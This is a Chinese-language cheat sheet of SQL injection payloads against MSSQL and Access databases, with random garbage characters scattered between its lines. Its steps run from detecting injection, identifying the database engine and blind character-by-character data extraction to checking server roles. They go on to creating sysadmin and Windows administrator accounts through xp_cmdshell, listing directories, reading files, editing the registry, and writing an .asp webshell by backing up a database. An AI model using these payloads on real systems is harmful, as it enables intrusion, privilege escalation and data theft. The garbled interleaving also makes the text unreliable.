1.判断是否有注入;and 1=1 ;and 1=2 V��d�[�[<�
2.初步判断是否是mssql ;and user>0 Wa%Z�t�*7�
�"gXz{�$q�
3.注入参数是字符'and [查询条件] and ''=' /i|��T���\
�R_ojK&%�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' b��>AFhj�:
&Ib��8xwb:
5.判断数据库系统 >h/J{T(P>h
!�L"3Ot�d
;and (select count(*) from sysobjects)>0 mssql \w�{�x-�}�
4A�:@+n%3m
;and (select count(*) from msysobjects)>0 access s�`l�y#+!.
p`-`(i=iJo
A/Kw"�l>�
EoqUF���a,
6.猜数据库 ;and (select Count(*) from [数据库名])>0 =h^��c�fyj
JK.lL]<p i
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Q*�mz�fsgr
I~EQuQ��>=
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 mX��T{)pU�
Q+E%"`3V4l
9.(1)猜字段的ascii值(access) T<06�y3sN
,x}p1E��Z
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �w@7NoD�=�
KK`P�<^8J
(2)猜字段的ascii值(mssql) E�r?Wg��09
k2l(!0�o|;
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 CZv.$H"�lW
����]�L4B
10.测试权限结构(mssql) j8?z@���iG
3��!&lio+<
;=1]h&��S�
O.e^?�ysp/
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- =]yJ�vn"��
Q4r)TR���,
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- MCU{@�\?Xf
wxEFM�)z�r
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �*y�OpMxE�
A@#9X'C�$^
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- O.CR�F-`�t
"|��V{@)!t
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �_��, �/m�
/o#!9H����
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �P�0,)
G�w
w~QUG^0�Fx
;and 1=(select IS_MEMBER('db_owner'));-- ��7�%L%dyN
l�q=�|��=
fD#��|C~:=
�:;�\>�jxA
11.添加mssql和系统的帐户 �(L_t�xd4�
#�>dfP"}&,
;exec master.dbo.sp_addlogin username;-- �gb�M�#jhQ
;exec master.dbo.sp_password null,username,password;-- �}Og��zSnR
I�F%�^H�K@
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 7(lR$,bE;=
*��;�. l/
;exec master.dbo.xp_cmdshell 'net user username password LF?83P,UJ#
Zso&.IATng
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ��/r�N%��y
1i�E�Z9�J?
;exec master.dbo.xp_cmdshell 'net user username password /add';-- A"Fl�H:�Pn
VY�I%U'�9Q
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �1$e��z}k,
48Y��5ppcS
"*�|p��lB�
w35r\x�� +
12.(1)遍历目录 �{�X<�mr~
�7F.t�>$'�
;create table dirs(paths varchar(100), id int) U8kH�'O��D
_�In[Z?�P}
;insert dirs exec master.dbo.xp_dirtree 'c:\' 7�
N��+;K0
*`[d�C,+`.
;and (select top 1 paths from dirs)>0 �Px5ArS�S
My�0h�9'K
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ��u{x�jFx-
i��X qB-4"
I^�sWf3'db
&#a�Q mgDF
(2)遍历目录 �5*~Mv<#��
GJ�W+'-�f�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- p�"f=[aw�p
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 2����j8^Z�
p*)R����P2
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �x�nWCio>M
�ik0�2Q�,J
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 _,(]T&j #2
�) \Mwv&k1
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��w-\U;&�8
qW[p .�j�N
4$J:A�~2H]
��cGiS�[-g
13.mssql中的存储过程 FU��/�y�Jy
j>�X;a3�9|
xp_regenumvalues 注册表根键, 子键 �4a�]m=]Hm
4&;.>{�:;
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 B8-v!4b0`�
GCCmUR9�d
xp_regread 根键,子键,键值名 w_|R�.T�\7
2P`QS@v0a=
;exec xp_regread �=\.Oc+p4
�%:oy�Hlz%
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 D"�_~Njf��
�I9P<�!#q>
xp_regwrite 根键,子键, 值名, 值类型, 值
E��;\XZ<E
),%/T,��!@
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �|E�$Jt-'�
c��n#JO^8
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �?�n)�r1m�
rBLk�owDP*
xp_regdeletevalue 根键,子键,值名 `"Q�UA ��G
g{w�IdV���
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 (�v(�!l=�3
D7c�OEL<��
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 z!27�#�gbL
�G�s%IZo_�
�1><\�3�+8
Q>f^*FyOw<
14.mssql的backup创建webshell !PUbaF-.6�
�^p(t*%�LM
use model �e\��i� K�
5g �
,�u\`
create table cmd(str image); ���{n}�6�
+%(i��G�I{
insert into cmd(str) values (''); c7T9kV�8hS
G��b�+�cT
backup database model to disk='c:\l.asp'; %J4]T35�^2
�f2�Fr�b�
SvC|"-[mJ�
�F��_;oZ �
15.mssql内置函数 "�8�|�y��
�oZ95�)'L,
;and (select @@version)>0 获得Windows的版本号 opT�DW)���
OQ"%(w�>Hb
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Z0T{1Y�EJ�
b3}928!D-@
;and (select user_name())>0 爆当前系统的连接用户 Et~b^8��$>
�mN3}wJ�}J
;and (select db_name())>0 得到当前连接的数据库 �h+�F@apUS
M�$��g%kqa
��(;YO]U4�
'�8`{u[��:
16.简洁的webshell I��$0JAy�
7onMKMktM%
use model k+S+��: 5�
���-a(�f�-
create table cmd(str image); =1�t�#$�JG
m)9N9Ii�#)
insert into cmd(str) values (''); ���rZ<0�ks
�>�kO�c��a
backup database model to disk='g:\wwwtest\l.asp';
